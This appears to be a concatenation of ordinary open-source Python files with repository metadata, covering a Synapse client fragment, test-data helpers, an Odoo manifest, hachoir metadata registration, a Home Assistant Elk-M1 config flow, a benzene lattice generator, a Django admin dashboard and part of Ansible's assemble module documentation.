:param name: Name of submission :param entityId: Synapse ID of the Entity to submit :param evaluationId: ID of the Evaluation to which the Entity is to be submitted :param versionNumber: Version number of the submitted Entity :param submitterAlias: A pseudonym or team name for a challenge entry """ @classmethod def getURI(cls, id): return '/evaluation/submission/%s' %id def __init__(self, **kwargs): if not ('evaluationId' in kwargs and 'entityId' in kwargs and 'versionNumber' in kwargs): raise KeyError super(Submission, self).__init__(kwargs) def postURI(self): return '/evaluation/submission?etag=%s' %self.etag def putURI(self): return '/evaluation/submission/%s' %self.id def deleteURI(self): return '/evaluation/submission/%s' %self.id class SubmissionStatus(DictObject): """ Builds an Synapse submission status object. :param score: The score of the submission :param status: Status can be one of {'OPEN', 'CLOSED', 'SCORED', 'INVALID'}. """ @classmethod def getURI(cls, id): return '/evaluation/submission/%s/status' %id def __init__(self, **kwargs): super(SubmissionStatus, self).__init__(kwargs) def postURI(self): return '/evaluation/submission/%s/status' %self.id def putURI(self): return '/evaluation/submission/%s/status' %self.id def deleteURI(self): return '/evaluation/submission/%s/status' %self.id
apache-2.0
Dhanayan123/indivo_server
indivo/tests/data/base.py
4
8765
import copy, random, string

# Public API of the test-data framework: contexts that manage model identity,
# the base TestModel wrapper around Django models, lazy references into data
# lists, and the key types used to express relations between test items.
__all__ = [
    'TestDataContext',
    'TestModel',
    'TestDataItem',
    'scope',
    'ForeignKey',
    'ManyToManyKey',
    ]

class TestDataContext(object):
    """Tracks which test models have been instantiated, per subcontext.

    A subcontext is a dict mapping a test-data id to either the sentinel
    MARKED (creation in progress) or the finished TestModel instance, so each
    piece of raw test data is only turned into a model once.
    """

    # Sentinel stored while a model is being built; lets us detect circular
    # foreign-key references (we would re-enter _add_model while MARKED).
    MARKED = 'marked'

    def __init__(self):
        # Start with a single, empty subcontext (index 0).
        self.subcontexts = [{}]

    def tdi_id(self, tdi):
        """ Get a unique id for the test_data.

        This is composed of two things: the actual id() of the list that it
        came from, and the index in that list.

        If we have a lazy item, we'll have to de-ref it here.
        """
        if tdi.lazy:
            tdi._get_data_list()
        return '%s_%s'%(str(id(tdi.data_list)), str(tdi.index))

    def del_model(self, test_data_id, subcontext_id):
        # Remove a previously registered model from a subcontext.
        subcontext = self.subcontexts[subcontext_id]
        if subcontext.has_key(test_data_id):
            del subcontext[test_data_id]
        else:
            raise ValueError('No such model')

    def _add_subcontext(self):
        # DISABLED, FOR NOW: multiple subcontexts are not created, so this
        # always returns the index of the single initial subcontext (0).
        # self.subcontexts.append({})
        return len(self.subcontexts) - 1

    def _generate_random_string(self, length=5):
        # string.printable[0:62] is the alphanumeric prefix (digits + letters),
        # so ids stay readable and free of whitespace/punctuation.
        return "".join([random.choice(string.printable[0:62]) for i in range(length)])

    def _add_model(self, test_data_item, subcontext_id, force_create=False, **overrides):
        """Instantiate (or fetch) the TestModel for a test data item.

        force_create: build a second instance even if one already exists,
        under an extended id. overrides: raw-data fields to replace.
        """
        test_model_id = self.tdi_id(test_data_item)

        # Look for the desired model in our subcontext
        subcontext = self.subcontexts[subcontext_id]

        # First time we've ever seen this model: Mark for processing
        if not subcontext.has_key(test_model_id):
            subcontext[test_model_id] = self.MARKED

        # We've seen this model before, but it hasn't been fully saved yet.
        # Ideally, we would handle this behavior in a sophisticated way
        # (i.e. add ourself to a queue for later processing).
        # But this is just test data, after all, and these chains can only
        # occur if the test data is created with circular foreignkey
        # references, so let's just complain.
        elif subcontext[test_model_id] == self.MARKED:
            raise Exception('Circular references in test data: can\'t save test items.')

        # We've seen this model before, and it has been fully saved: just
        # return it, unless we've been explicitly told not to.
        elif not force_create:
            return subcontext[test_model_id]

        # We want to create 2 of the same model. Extend the model's id to make
        # it unique.
        # NOTE: any reference to the same index of the same list will return
        # the first instance of the model, not this one. This one must be
        # found using the identifier passed into the TestModel constructor.
        else:
            test_model_id = '%s%s'%(test_model_id, self._generate_random_string())
            subcontext[test_model_id] = self.MARKED

        # create the model, with info that points to this specific subcontext
        raw_data_dict = copy.deepcopy(test_data_item.raw_data)
        raw_data_dict.update(identifier=test_model_id, context=self, subcontext_id=subcontext_id)
        raw_data_dict.update(overrides)
        test_model = test_data_item.tm_subclass(**raw_data_dict)

        # register it with our subcontext, now that processing is done
        subcontext[test_model_id] = test_model
        return test_model

    def add_key(self, key, from_instance):
        """Resolve a ForeignKey/ManyToManyKey into TestModel instance(s).

        key.to is either a single TestDataItem (ForeignKey) or an iterable of
        them (ManyToManyKey); iterating a single item raises TypeError, which
        is how the two cases are distinguished (EAFP).
        """
        subcontext_id = from_instance.subcontext_id
        try:
            ret = []
            for test_data_item in key.to:
                ret.append(self._add_model(test_data_item, subcontext_id))
            return ret
        except TypeError:
            return self._add_model(key.to, subcontext_id)

    def add_model(self, test_data_item, **overrides):
        # Public entry point: place the model in the current subcontext.
        subcontext_id = self._add_subcontext()
        return self._add_model(test_data_item, subcontext_id, **overrides)

class TestModel(object):
    """Base wrapper pairing raw test data with a lazily built Django model.

    Subclasses declare model_fields/model_class and implement _setupargs.
    Every attribute assignment is routed through __setattr__, which resolves
    key references and keeps the underlying django_obj in sync.
    """

    model_fields = [] # A list of field names needed to construct a Django Model
    model_class = None # The Django Model Subclass to construct

    def __init__(self, identifier, context, subcontext_id, **subclass_args):
        # NOTE: these assignments already pass through __setattr__ below.
        self.identifier = identifier
        self.context = context
        self.subcontext_id = subcontext_id
        self._setupargs(**subclass_args)
        self.marked_for_save = False

    def _setupargs(self, **subclass_args):
        """ Should be overriden by subclasses to take initialization args
        and set up the subclass model.
        """
        raise NotImplementedError

    def update(self, field_dict, **fields):
        # Bulk attribute update; keyword args take precedence over field_dict.
        field_dict.update(fields)
        for k, v in field_dict.iteritems():
            setattr(self, k, v)

    def __setattr__(self, item, value):
        """Update our django_object whenever our fields get updated.

        Follow foreignKeys.
        """
        # setup foreign keys: resolve the value into (what we store on self,
        # what the django object should hold, i.e. a saved model instance).
        self_attr_val, django_obj_attr_val = self._foreign_key_check(value)

        # update the django object (only once it exists, and only for fields
        # that map onto the Django model)
        if hasattr(self, 'django_obj') and item in self.model_fields:
            setattr(self.django_obj, item, django_obj_attr_val)
            self.dirty = True

        return super(TestModel, self).__setattr__(item, self_attr_val)

    def _foreign_key_check(self, field):
        """Return (value for this wrapper, value for the Django model).

        Keys are resolved to TestModels via the context; TestModels (and
        lists of them) are saved so the Django side receives saved instances.
        Plain values pass through unchanged.
        """
        if isinstance(field, ForeignKey):
            tm = self.context.add_key(field, self)
            return (tm, tm.save())
        elif isinstance(field, TestModel):
            return (field, field.save())
        elif isinstance(field, ManyToManyKey):
            tms = self.context.add_key(field, self)
            return (tms, [tm.save() for tm in tms])
        elif isinstance(field, list) and field and isinstance(field[0], TestModel):
            return (field, [tm.save() for tm in field])
        return (field, field)

    def build_django_obj(self):
        # handle foreign keys: take the django-side value ([1]) for each field
        model_args = dict([(f, self._foreign_key_check(getattr(self, f))[1]) for f in self.model_fields])
        self.django_obj = self.model_class(**model_args)

    def save(self):
        """Build (if needed) and save the Django object; return it."""
        # Make sure we've built the object to save
        dobj_p = getattr(self, 'django_obj', False)
        if not dobj_p:
            self.build_django_obj()

        # Save our django object, but only if it has unsaved changes
        # (self.dirty defaults to True so a fresh object is always saved once)
        dirty_p = getattr(self, 'dirty', True)
        if dirty_p:
            self.django_obj.save()
            self.dirty = False

        return self.django_obj

class TestDataItem(object):
    """A (possibly lazy) pointer to one raw-data dict in a scoped data list.

    Lazy items record only (module_name, list_name, index) and import the
    list on first access, which avoids import cycles between data modules.
    """

    def __init__(self, index, module_name=None, list_name=None, data_list=None, lazy=False):
        self.index = index
        self.lazy = lazy
        if lazy:
            self.module_name = module_name
            self.list_name = list_name
            self.data_list = None
        else:
            self.data_list = data_list

    def _get_data_list(self):
        # Import the data module and grab the named list; level=-1 requests
        # the Python 2 relative-then-absolute import behavior.
        self.data_list = getattr(__import__(self.module_name, globals(), locals(), [self.list_name], -1), self.list_name)

    @property
    def tm_subclass(self):
        # TestModel subclass attached to the list by scope().
        if self.data_list is None:
            self._get_data_list()
        return self.data_list.model_class

    @property
    def raw_data(self):
        # The raw kwargs-dict for this item.
        if self.data_list is None:
            self._get_data_list()
        return self.data_list[self.index]

def scope(raw_list, tm_subclass):
    """Wrap raw_list so it carries the TestModel subclass it belongs to."""
    class TestModelScopedList(list):
        def __init__(self, tm_subclass, *args, **kwargs):
            self.model_class = tm_subclass
            return super(TestModelScopedList, self).__init__(*args, **kwargs)

        def __add__(self, other):
            """ Allow concatenation of multiple scoped lists with the same
            tm_subclass.
            """
            other_model_class = getattr(other, 'model_class', None)
            if other_model_class and other_model_class == self.model_class:
                return TestModelScopedList(self.model_class, super(TestModelScopedList, self).__add__(other))
            else:
                raise TypeError('Can only concatenate TestModelScopedLists with the same TestModel subclasses')

    return TestModelScopedList(tm_subclass, raw_list)

class Key(object):
    """Abstract reference from one test data item to other item(s)."""

    def __init__(self, module_name, list_name, index_arg):
        self.module_name = module_name
        self.list_name = list_name
        self.index_arg = index_arg

    @property
    def to(self):
        """ Should return the raw TestDataIdentifier(s) pointed to by the key. """
        raise NotImplementedError

class ForeignKey(Key):
    # index_arg is a single index; resolves to one lazy TestDataItem.
    @property
    def to(self):
        return TestDataItem(self.index_arg, module_name=self.module_name, list_name=self.list_name, lazy=True)

class ManyToManyKey(Key):
    # index_arg is an iterable of indices; resolves to a list of lazy items.
    @property
    def to(self):
        return [TestDataItem(i, module_name=self.module_name, list_name=self.list_name, lazy=True) for i in self.index_arg]
gpl-3.0
fuselock/odoo
addons/report_intrastat/__openerp__.py
261
1805
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## { 'name': 'Intrastat Reporting', 'version': '1.0', 'category': 'Accounting & Finance', 'description': """ A module that adds intrastat reports. ===================================== This module gives the details of the goods traded between the countries of European Union.""", 'author': 'OpenERP SA', 'website': 'http://www.openerp.com', 'depends': ['base', 'product', 'stock', 'sale', 'purchase'], 'data': [ 'security/ir.model.access.csv', 'report_intrastat_view.xml', 'intrastat_report.xml', 'report_intrastat_data.xml', 'views/report_intrastatinvoice.xml' ], 'demo': [], 'test': ['test/report_intrastat_report.yml'], 'installable': True, 'auto_install': False, } # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
agpl-3.0
Manouchehri/metagoofil
hachoir_metadata/register.py
16
7060
"""Declaration of every metadata item known to hachoir-metadata.

registerAllItems() registers, on a metadata container, each supported key
together with a numeric sort priority, translated label and optional type
constraints, value filter, display formatter and conversion (setter) hook.
"""

from hachoir_core.i18n import _
from hachoir_core.tools import (
    humanDuration, humanBitRate,
    humanFrequency, humanBitSize, humanFilesize,
    humanDatetime)
from hachoir_core.language import Language
from hachoir_metadata.filter import Filter, NumberFilter, DATETIME_FILTER
from datetime import date, datetime, timedelta
from hachoir_metadata.formatter import (
    humanAudioChannel, humanFrameRate, humanComprRate, humanAltitude,
    humanPixelSize, humanDPI)
from hachoir_metadata.setter import (
    setDatetime, setTrackNumber, setTrackTotal, setLanguage)
from hachoir_metadata.metadata_item import Data

# Sanity bounds used by the NumberFilters below; values outside these ranges
# are rejected as implausible rather than stored.
MIN_SAMPLE_RATE = 1000              # 1 kHz
MAX_SAMPLE_RATE = 192000            # 192 kHz
MAX_NB_CHANNEL = 8                  # 8 channels
MAX_WIDTH = 20000                   # 20 000 pixels
MAX_BIT_RATE = 500 * 1024 * 1024    # 500 Mbit/s
MAX_HEIGHT = MAX_WIDTH
MAX_DPI_WIDTH = 10000
MAX_DPI_HEIGHT = MAX_DPI_WIDTH
MAX_NB_COLOR = 2 ** 24              # 16 million of color
MAX_BITS_PER_PIXEL = 256            # 256 bits/pixel
MAX_FRAME_RATE = 150                # 150 frame/sec
MAX_NB_PAGE = 20000
MAX_COMPR_RATE = 1000.0
MIN_COMPR_RATE = 0.001
MAX_TRACK = 999

# Accept durations between 1 ms and 1 year.
DURATION_FILTER = Filter(timedelta,
    timedelta(milliseconds=1),
    timedelta(days=365))

def registerAllItems(meta):
    """Register every known metadata key on *meta*.

    The integer passed as second argument to Data is the item's priority.
    NOTE(review): several priority values are reused (511 for
    longitude/altitude, 530-532 for location/city/country vs. the camera
    items, 604 for bit_rate/aspect_ratio) -- presumably priorities only
    influence ordering and need not be unique; confirm against Data's
    implementation before relying on them as identifiers.
    """
    # -- Title / author information --
    meta.register(Data("title", 100, _("Title"), type=unicode))
    meta.register(Data("artist", 101, _("Artist"), type=unicode))
    meta.register(Data("author", 102, _("Author"), type=unicode))
    meta.register(Data("music_composer", 103, _("Music composer"), type=unicode))

    # -- Album / document-level items --
    meta.register(Data("album", 200, _("Album"), type=unicode))
    meta.register(Data("duration", 201, _("Duration"),
        # integer in milliseconde
        type=timedelta, text_handler=humanDuration, filter=DURATION_FILTER))
    meta.register(Data("nb_page", 202, _("Nb page"),
        filter=NumberFilter(1, MAX_NB_PAGE)))
    meta.register(Data("music_genre", 203, _("Music genre"), type=unicode))
    meta.register(Data("language", 204, _("Language"),
        conversion=setLanguage, type=Language))
    meta.register(Data("track_number", 205, _("Track number"),
        conversion=setTrackNumber, filter=NumberFilter(1, MAX_TRACK),
        type=(int, long)))
    meta.register(Data("track_total", 206, _("Track total"),
        conversion=setTrackTotal, filter=NumberFilter(1, MAX_TRACK),
        type=(int, long)))
    meta.register(Data("organization", 210, _("Organization"), type=unicode))
    meta.register(Data("version", 220, _("Version")))

    # -- Image / audio technical properties --
    meta.register(Data("width", 301, _("Image width"),
        filter=NumberFilter(1, MAX_WIDTH), type=(int, long),
        text_handler=humanPixelSize))
    meta.register(Data("height", 302, _("Image height"),
        filter=NumberFilter(1, MAX_HEIGHT), type=(int, long),
        text_handler=humanPixelSize))
    meta.register(Data("nb_channel", 303, _("Channel"),
        text_handler=humanAudioChannel, filter=NumberFilter(1, MAX_NB_CHANNEL),
        type=(int, long)))
    meta.register(Data("sample_rate", 304, _("Sample rate"),
        text_handler=humanFrequency,
        filter=NumberFilter(MIN_SAMPLE_RATE, MAX_SAMPLE_RATE),
        type=(int, long, float)))
    meta.register(Data("bits_per_sample", 305, _("Bits/sample"),
        text_handler=humanBitSize, filter=NumberFilter(1, 64),
        type=(int, long)))
    meta.register(Data("image_orientation", 306, _("Image orientation")))
    meta.register(Data("nb_colors", 307, _("Number of colors"),
        filter=NumberFilter(1, MAX_NB_COLOR), type=(int, long)))
    meta.register(Data("bits_per_pixel", 308, _("Bits/pixel"),
        filter=NumberFilter(1, MAX_BITS_PER_PIXEL), type=(int, long)))
    meta.register(Data("filename", 309, _("File name"), type=unicode))
    meta.register(Data("file_size", 310, _("File size"),
        text_handler=humanFilesize, type=(int, long)))
    meta.register(Data("pixel_format", 311, _("Pixel format")))
    meta.register(Data("compr_size", 312, _("Compressed file size"),
        text_handler=humanFilesize, type=(int, long)))
    meta.register(Data("compr_rate", 313, _("Compression rate"),
        text_handler=humanComprRate,
        filter=NumberFilter(MIN_COMPR_RATE, MAX_COMPR_RATE),
        type=(int, long, float)))
    meta.register(Data("width_dpi", 320, _("Image DPI width"),
        filter=NumberFilter(1, MAX_DPI_WIDTH), type=(int, long),
        text_handler=humanDPI))
    meta.register(Data("height_dpi", 321, _("Image DPI height"),
        filter=NumberFilter(1, MAX_DPI_HEIGHT), type=(int, long),
        text_handler=humanDPI))

    # -- File attributes --
    meta.register(Data("file_attr", 400, _("File attributes")))
    meta.register(Data("file_type", 401, _("File type")))
    meta.register(Data("subtitle_author", 402, _("Subtitle author"),
        type=unicode))

    # -- Dates and history --
    meta.register(Data("creation_date", 500, _("Creation date"),
        text_handler=humanDatetime, filter=DATETIME_FILTER,
        type=(datetime, date), conversion=setDatetime))
    meta.register(Data("last_modification", 501, _("Last modification"),
        text_handler=humanDatetime, filter=DATETIME_FILTER,
        type=(datetime, date), conversion=setDatetime))
    meta.register(Data("revision_history", 502, _("Revision history"),
        type=unicode))

    # -- Geographic information --
    meta.register(Data("latitude", 510, _("Latitude"), type=float))
    meta.register(Data("longitude", 511, _("Longitude"), type=float))
    meta.register(Data("altitude", 511, _("Altitude"), type=float,
        text_handler=humanAltitude))
    meta.register(Data("location", 530, _("Location"), type=unicode))
    meta.register(Data("city", 531, _("City"), type=unicode))
    meta.register(Data("country", 532, _("Country"), type=unicode))
    meta.register(Data("charset", 540, _("Charset"), type=unicode))
    meta.register(Data("font_weight", 550, _("Font weight")))

    # -- Camera (EXIF-style) items --
    meta.register(Data("camera_aperture", 520, _("Camera aperture")))
    meta.register(Data("camera_focal", 521, _("Camera focal")))
    meta.register(Data("camera_exposure", 522, _("Camera exposure")))
    meta.register(Data("camera_brightness", 530, _("Camera brightness")))
    meta.register(Data("camera_model", 531, _("Camera model"), type=unicode))
    meta.register(Data("camera_manufacturer", 532, _("Camera manufacturer"),
        type=unicode))

    # -- Miscellaneous / container-level items --
    meta.register(Data("compression", 600, _("Compression")))
    meta.register(Data("copyright", 601, _("Copyright"), type=unicode))
    meta.register(Data("url", 602, _("URL"), type=unicode))
    meta.register(Data("frame_rate", 603, _("Frame rate"),
        text_handler=humanFrameRate,
        filter=NumberFilter(1, MAX_FRAME_RATE), type=(int, long, float)))
    meta.register(Data("bit_rate", 604, _("Bit rate"),
        text_handler=humanBitRate,
        filter=NumberFilter(1, MAX_BIT_RATE), type=(int, long, float)))
    meta.register(Data("aspect_ratio", 604, _("Aspect ratio"),
        type=(int, long, float)))
    meta.register(Data("os", 900, _("OS"), type=unicode))
    meta.register(Data("producer", 901, _("Producer"), type=unicode))
    meta.register(Data("comment", 902, _("Comment"), type=unicode))
    meta.register(Data("format_version", 950, _("Format version"),
        type=unicode))
    meta.register(Data("mime_type", 951, _("MIME type"), type=unicode))
    meta.register(Data("endian", 952, _("Endianness"), type=unicode))
gpl-2.0
GenericStudent/home-assistant
homeassistant/components/elkm1/config_flow.py
9
5265
"""Config flow for Elk-M1 Control integration.""" import logging from urllib.parse import urlparse import elkm1_lib as elkm1 import voluptuous as vol from homeassistant import config_entries, exceptions from homeassistant.const import ( CONF_ADDRESS, CONF_HOST, CONF_PASSWORD, CONF_PROTOCOL, CONF_TEMPERATURE_UNIT, CONF_USERNAME, TEMP_CELSIUS, TEMP_FAHRENHEIT, ) from homeassistant.util import slugify from . import async_wait_for_elk_to_sync from .const import CONF_AUTO_CONFIGURE, CONF_PREFIX from .const import DOMAIN # pylint:disable=unused-import _LOGGER = logging.getLogger(__name__) PROTOCOL_MAP = {"secure": "elks://", "non-secure": "elk://", "serial": "serial://"} DATA_SCHEMA = vol.Schema( { vol.Required(CONF_PROTOCOL, default="secure"): vol.In( ["secure", "non-secure", "serial"] ), vol.Required(CONF_ADDRESS): str, vol.Optional(CONF_USERNAME, default=""): str, vol.Optional(CONF_PASSWORD, default=""): str, vol.Optional(CONF_PREFIX, default=""): str, vol.Optional(CONF_TEMPERATURE_UNIT, default=TEMP_FAHRENHEIT): vol.In( [TEMP_FAHRENHEIT, TEMP_CELSIUS] ), } ) VALIDATE_TIMEOUT = 35 async def validate_input(data): """Validate the user input allows us to connect. Data has the keys from DATA_SCHEMA with values provided by the user. 
""" userid = data.get(CONF_USERNAME) password = data.get(CONF_PASSWORD) prefix = data[CONF_PREFIX] url = _make_url_from_data(data) requires_password = url.startswith("elks://") if requires_password and (not userid or not password): raise InvalidAuth elk = elkm1.Elk( {"url": url, "userid": userid, "password": password, "element_list": ["panel"]} ) elk.connect() timed_out = False if not await async_wait_for_elk_to_sync(elk, VALIDATE_TIMEOUT): _LOGGER.error( "Timed out after %d seconds while trying to sync with ElkM1 at %s", VALIDATE_TIMEOUT, url, ) timed_out = True elk.disconnect() if timed_out: raise CannotConnect if elk.invalid_auth: raise InvalidAuth device_name = data[CONF_PREFIX] if data[CONF_PREFIX] else "ElkM1" # Return info that you want to store in the config entry. return {"title": device_name, CONF_HOST: url, CONF_PREFIX: slugify(prefix)} def _make_url_from_data(data): host = data.get(CONF_HOST) if host: return host protocol = PROTOCOL_MAP[data[CONF_PROTOCOL]] address = data[CONF_ADDRESS] return f"{protocol}{address}" class ConfigFlow(config_entries.ConfigFlow, domain=DOMAIN): """Handle a config flow for Elk-M1 Control.""" VERSION = 1 CONNECTION_CLASS = config_entries.CONN_CLASS_LOCAL_PUSH def __init__(self): """Initialize the elkm1 config flow.""" self.importing = False async def async_step_user(self, user_input=None): """Handle the initial step.""" errors = {} if user_input is not None: if self._url_already_configured(_make_url_from_data(user_input)): return self.async_abort(reason="address_already_configured") try: info = await validate_input(user_input) except CannotConnect: errors["base"] = "cannot_connect" except InvalidAuth: errors["base"] = "invalid_auth" except Exception: # pylint: disable=broad-except _LOGGER.exception("Unexpected exception") errors["base"] = "unknown" if "base" not in errors: await self.async_set_unique_id(user_input[CONF_PREFIX]) self._abort_if_unique_id_configured() if self.importing: return 
self.async_create_entry(title=info["title"], data=user_input) return self.async_create_entry( title=info["title"], data={ CONF_HOST: info[CONF_HOST], CONF_USERNAME: user_input[CONF_USERNAME], CONF_PASSWORD: user_input[CONF_PASSWORD], CONF_AUTO_CONFIGURE: True, CONF_TEMPERATURE_UNIT: user_input[CONF_TEMPERATURE_UNIT], CONF_PREFIX: info[CONF_PREFIX], }, ) return self.async_show_form( step_id="user", data_schema=DATA_SCHEMA, errors=errors ) async def async_step_import(self, user_input): """Handle import.""" self.importing = True return await self.async_step_user(user_input) def _url_already_configured(self, url): """See if we already have a elkm1 matching user input configured.""" existing_hosts = { urlparse(entry.data[CONF_HOST]).hostname for entry in self._async_current_entries() } return urlparse(url).hostname in existing_hosts class CannotConnect(exceptions.HomeAssistantError): """Error to indicate we cannot connect.""" class InvalidAuth(exceptions.HomeAssistantError): """Error to indicate there is invalid auth."""
apache-2.0
ajkerr0/kappa
kappa/lattice/benzene.py
1
1738
# -*- coding: utf-8 -*-
"""Benzene-ring lattice generator.

Builds atomic positions, bonded-neighbor lists and atomic numbers for a
benzene ring carrying only four hydrogens: the first and last carbons are
left bare so the ring can be attached to another structure.
"""

import numpy as np


def main():
    """Return ``(positions, neighbor_lists, atomic_numbers)`` for the ring."""
    positions = generate_benzene_sites()
    neighbors, numbers = get_neighbors()
    return positions, neighbors, numbers


def generate_benzene_sites():
    """Generate the locations of a benzene ring, one without hydrogen for
    attachment to something else.

    Returns a list of ten 3-vectors: six carbons followed by the four
    hydrogens bonded to the second through fifth carbons.
    """
    cc = 1.45                                # starting C-C distance
    half_angle = 120 * np.pi / 180.0 / 2.0   # half the 120 degree bond angle (radians)
    dx = cc * np.cos(half_angle)
    dy = cc * np.sin(half_angle)

    # Walk around the ring starting from the origin.
    c1 = np.array([0., 0., 0.])
    c2 = c1 + np.array([dx, dy, 0.])
    c3 = c2 + np.array([cc, 0., 0.])
    c4 = c1 + np.array([dx, -dy, 0.])
    c5 = c4 + np.array([cc, 0., 0.])
    c6 = c5 + np.array([dx, dy, 0.])

    ch = 1.15                                # C-H distance
    hx = ch * np.cos(half_angle)
    hy = ch * np.sin(half_angle)

    # c1 and c6 deliberately get no hydrogen: they are the attachment sites.
    h2 = c2 + np.array([-hx, hy, 0.])
    h3 = c3 + np.array([hx, hy, 0.])
    h5 = c5 + np.array([hx, -hy, 0.])
    h4 = c4 + np.array([-hx, -hy, 0.])

    return [c1, c2, c3, c4, c5, c6, h2, h3, h4, h5]


def get_neighbors():
    """Return ``(neighbor_lists, atomic_numbers)`` for the ten sites.

    Site ordering matches ``generate_benzene_sites``: indices 0-5 are the
    carbons, 6-9 the hydrogens.
    """
    neighbors = [
        [1, 3],       # carbon 0: two ring bonds only (attachment site)
        [0, 2, 6],    # carbon 1: ring bonds + hydrogen 6
        [1, 5, 7],    # carbon 2: ring bonds + hydrogen 7
        [0, 4, 8],    # carbon 3: ring bonds + hydrogen 8
        [3, 5, 9],    # carbon 4: ring bonds + hydrogen 9
        [2, 4],       # carbon 5: two ring bonds only (attachment site)
        [1],          # hydrogen on carbon 1
        [2],          # hydrogen on carbon 2
        [3],          # hydrogen on carbon 3
        [4],          # hydrogen on carbon 4
    ]

    # Atomic numbers: six carbons (Z=6) then four hydrogens (Z=1).
    numbers = np.concatenate((np.full(6, 6, dtype=int),
                              np.full(4, 1, dtype=int)))

    return neighbors, numbers
mit
jordic/django_tiny_shop
tshop/tadmin/dashboard.py
1
3222
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Author: jordi collell <jordi@tempointeractiu.cat>
# http://tempointeractiu.cat
# -------------------------------------------------------------------
''' '''
"""
This file was generated with the customdashboard management command, it
contains the two classes for the main dashboard and app index dashboard.
You can customize these classes as you want.

To activate your index dashboard add the following to your settings.py::
    ADMIN_TOOLS_INDEX_DASHBOARD = 'gshop.dashboard.CustomIndexDashboard'

And to activate the app index dashboard::
    ADMIN_TOOLS_APP_INDEX_DASHBOARD = 'gshop.dashboard.CustomAppIndexDashboard'
"""

from django.utils.translation import ugettext_lazy as _
# NOTE: reverse is only referenced inside the disabled quick-links block below.
from django.core.urlresolvers import reverse
from admin_tools.dashboard import modules, Dashboard, \
    AppIndexDashboard
from admin_tools.utils import get_admin_site_name

from order.models import Order
import signals


class LatestOrders(modules.DashboardModule):
    """Dashboard module that lists the ten most recent orders."""

    title = _(u'Últimos Pedidos')
    template = 'dashboard/latest_orders.html'

    def __init__(self, *args, **kwargs):
        super(LatestOrders, self).__init__(*args, **kwargs)
        # Ten newest orders by date; consumed by the template above.
        self.objects = Order.objects.all().order_by('-date')[0:10]

    def is_empty(self):
        # Always render the module, even with no orders.
        return False


class ShopIndexDashboard(Dashboard):
    """
    Custom index dashboard for gshop.
    """
    def init_with_context(self, context):
        # site_name is only needed by the disabled quick-links block below.
        site_name = get_admin_site_name(context)
        # append a link list module for "quick links"
        # (disabled: the triple-quoted string below is intentionally dead code)
        '''
        self.children.append(modules.LinkList(
            _('Quick links'),
            layout='inline',
            draggable=False,
            deletable=False,
            collapsible=False,
            children=[
                [_('Return to site'), '/'],
                [_('Change password'),
                 reverse('%s:password_change' % site_name)],
                [_('Log out'), reverse('%s:logout' % site_name)],
            ]
        ))
        '''
        self.children.append(LatestOrders(
            _(u'Últimos Pedidos'),
            layout='inline',
            deletable=False,
        ))

        # Let other apps extend the index dashboard.
        signals.dashboard_index.send(sender=ShopIndexDashboard, dashboard=self)


class ShopAppIndexDashboard(AppIndexDashboard):
    """
    Custom app index dashboard for gshop.
    """

    # we disable title because its redundant with the model list module
    title = ''

    def __init__(self, *args, **kwargs):
        AppIndexDashboard.__init__(self, *args, **kwargs)

        # append a model list module and a recent actions module
        self.children += [
            modules.ModelList(self.app_title, self.models),
            modules.RecentActions(
                _('Recent Actions'),
                include_list=self.get_app_content_types(),
                limit=5
            )
        ]
        # Let other apps extend the per-app dashboard.
        signals.app_index_dashboard.send(sender=ShopAppIndexDashboard,
            dashboard=self)

    def init_with_context(self, context):
        """
        Use this method if you need to access the request context.
        """
        return super(ShopAppIndexDashboard, self).init_with_context(context)
bsd-3-clause
viru/ansible-modules-core
files/assemble.py
79
8158
#!/usr/bin/python # -*- coding: utf-8 -*- # (c) 2012, Stephen Fromm <sfromm@gmail.com> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. import os import os.path import shutil import tempfile import re DOCUMENTATION = ''' --- module: assemble short_description: Assembles a configuration file from fragments description: - Assembles a configuration file from fragments. Often a particular program will take a single configuration file and does not support a C(conf.d) style structure where it is easy to build up the configuration from multiple sources. M(assemble) will take a directory of files that can be local or have already been transferred to the system, and concatenate them together to produce a destination file. Files are assembled in string sorting order. Puppet calls this idea I(fragments). version_added: "0.5" options: src: description: - An already existing directory full of source files. required: true default: null aliases: [] dest: description: - A file to create using the concatenation of all of the source files. required: true default: null backup: description: - Create a backup file (if C(yes)), including the timestamp information so you can get the original file back if you somehow clobbered it incorrectly. required: false choices: [ "yes", "no" ] default: "no" delimiter: description: - A delimiter to separate the file contents. 
version_added: "1.4" required: false default: null remote_src: description: - If False, it will search for src at originating/master machine, if True it will go to the remote/target machine for the src. Default is True. choices: [ "True", "False" ] required: false default: "True" version_added: "1.4" regexp: description: - Assemble files only if C(regex) matches the filename. If not set, all files are assembled. All "\\" (backslash) must be escaped as "\\\\" to comply yaml syntax. Uses Python regular expressions; see U(http://docs.python.org/2/library/re.html). required: false default: null ignore_hidden: description: - A boolean that controls if files that start with a '.' will be included or not. required: false default: false version_added: "2.0" validate: description: - The validation command to run before copying into place. The path to the file to validate is passed in via '%s' which must be present as in the sshd example below. The command is passed securely so shell features like expansion and pipes won't work. 
